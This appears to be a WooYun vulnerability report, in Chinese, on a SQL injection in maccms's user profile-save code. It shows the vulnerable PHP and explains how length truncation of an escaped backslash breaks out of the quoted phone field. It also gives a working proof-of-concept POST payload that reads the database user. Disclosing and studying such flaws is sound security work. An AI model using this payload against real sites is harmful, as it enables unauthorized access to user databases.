WooYun.org

在文件/inc/module/user.php中：

elseif($method=='save')
{
	chklogin();
	$oldpass = be("post","u_oldpass");
	$password1 = be("post","u_password1");
	$password2 = be("post","u_password2");
	$u_qq= be("post","u_qq");
	$u_email = be("post","u_email");
	$u_phone = be("post","u_phone");
	$u_question = be("post","u_question");
	$u_answer = be("post","u_email");
	
	
	if(empty($password1) || empty($u_email)){
		alert ("表单信息不完整,请重填!"); exit;
	}
	
	if (strlen($u_email)>32) { $u_email = substring($u_email,32);}
	if (strlen($u_qq)>16) { $u_qq = substring($u_qq,16);}
	if (strlen($u_phone)>16) { $u_phone = substring($u_phone,16);}
	
	$col = array("u_qq","u_email","u_phone","u_question","u_answer");
	$val = array($u_qq,$u_email,$u_phone,$u_question,$u_answer);
	
	if ($password1 != ""){
		if ($password1 != $password2){ alert ("两次密码不同");exit; }
		$password1 = md5($password1);
		array_push($col,"u_password");
		array_push($val,$password1);
	}
	$db->Update ("{pre}user",$col ,$val ,"u_id=".$user["u_id"]);
	alertUrl ("修改成功！","index.php?m=user-info.html");
}

if (strlen($u_email)>32) { $u_email = substring($u_email,32);}
if (strlen($u_qq)>16) { $u_qq = substring($u_qq,16);}
if (strlen($u_phone)>16) { $u_phone = substring($u_phone,16);}
这里面存在着字符串截断的操作，利用这个截断功能，可以将转义后的内容\\ 变成\
这里执行的sql语句：
UPDATE mac_user SET u_qq='$u_qq',u_email='$u_email',u_phone='$u_phone',u_question='$u_question',u_answer='$u_answer',u_password='$u_password' WHERE u_id=1
其中$u_phone的长度为16. 这样我们设置$u_phone=123456789012345\ 转移再截断前16位，$u_phone的值是一样的。

这时候sql语句就变成
UPDATE mac_user SET u_qq='$u_qq',u_email='$u_email',u_phone='123456789012345\',u_question='$u_question',u_answer='$u_answer',u_password='$u_password' WHERE u_id=1
也就是将u_phone的值set成 123456789012345',u_question=。
接下来只要将$u_question设置成 ,injectsql#这种格式就可以实现sql注入了。
poc：
URL： maccms/index.php?m=user-save.html(需要登录）
post参数： u_password1=123456&u_password2=123456&u_qq=12345678&u_email=test%40gmail.com&u_phone=123456789012345\&u_question=,u_question=user()%23&u_answer=123456
访问后即可看到 找回密码问题 这一列已经显示了数据库当前账号